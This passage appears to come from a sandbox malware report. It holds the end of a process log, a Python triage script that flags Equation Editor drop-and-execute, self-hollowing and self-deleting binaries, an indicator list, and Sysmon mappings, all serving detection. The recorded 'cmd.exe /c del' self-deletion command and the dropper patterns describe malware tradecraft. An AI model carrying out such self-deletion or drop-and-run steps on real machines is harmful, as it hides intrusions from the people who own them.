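Path:C:\\Users\\user\\AppData\\Roaming\\medicomsh78694.exe
Commandline:{path}
MD5 hash:8807C2E0F2973A22812AF6E61BA72667
Imagebase:0xad0000

General
Start time:18:16:44
Path:C:\\Windows\\SysWOW64\\cmd.exe
Commandline:/c del "C:\\Users\\user\\AppData\\Roaming\\medicomsh78694.exe"
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Imagebase:0x4a2b0000
"""


def parse_blocks(text):
    """Split on the 'General' heading and turn 'Key:Value' lines into dicts.
    Only the first ':' separates key from value, so 'Start time:18:16:18'
    and Windows drive letters survive intact."""
    procs = []
    for chunk in re.split(r"^General\s*$", text, flags=re.M):
        fields = {}
        for line in chunk.strip().splitlines():
            key, sep, val = line.partition(":")
            if sep:
                fields[key.strip()] = val.strip()
        if "Path" in fields:
            procs.append(fields)
    return procs


def is_user_writable(path):
    """Directories an unprivileged dropper can write to and run from."""
    p = path.lower()
    return "\\appdata\\" in p or "\\users\\" in p or "\\programdata\\" in p


def triage(procs):
    """Return (finding, detail) tuples for the three chain patterns."""
    findings = []
    # 1. Equation Editor, then a binary from a user-writable directory.
    eq_idx = [i for i, p in enumerate(procs)
              if p["Path"].lower().endswith("eqnedt32.exe")]
    if eq_idx:
        for p in procs[eq_idx[0] + 1:]:
            if is_user_writable(p["Path"]):
                findings.append(("eqnedt32_drop_exec", p["Path"]))
                break
    # 2. Same path+MD5+imagebase twice, later instance started as "{path}".
    seen = defaultdict(list)
    for p in procs:
        seen[(p["Path"].lower(), p.get("MD5 hash"), p.get("Imagebase"))].append(p)
    for key, group in seen.items():
        if len(group) > 1 and any(g.get("Commandline") == "{path}" for g in group[1:]):
            findings.append(("self_hollowing", key[0]))
    # 3. cmd.exe /c del of a path that an earlier process ran from.
    run_paths = {p["Path"].lower() for p in procs}
    for p in procs:
        m = re.search(r'/c\s+del\s+"?([^"]+?)"?\s*$', p.get("Commandline", ""), re.I)
        if p["Path"].lower().endswith("cmd.exe") and m and m.group(1).lower() in run_paths:
            findings.append(("self_delete", m.group(1)))
    return findings


def iocs(procs):
    """(path, MD5) pairs worth blocking: binaries run from user-writable dirs."""
    return sorted({(p["Path"], p["MD5 hash"]) for p in procs if is_user_writable(p["Path"])})


if __name__ == "__main__":
    ps = parse_blocks(REPORT)
    for f in triage(ps):
        print(f)
    for path, md5 in iocs(ps):
        print("block:", md5, path)
```

The same three checks map onto endpoint telemetry directly: Sysmon Event ID 1 with ParentImage ending in EQNEDT32.EXE and Image under \Users\, a process whose Image equals its ParentImage with the same hash, and cmd.exe with "/c del" naming a path that appeared as Image earlier in the same session.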

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >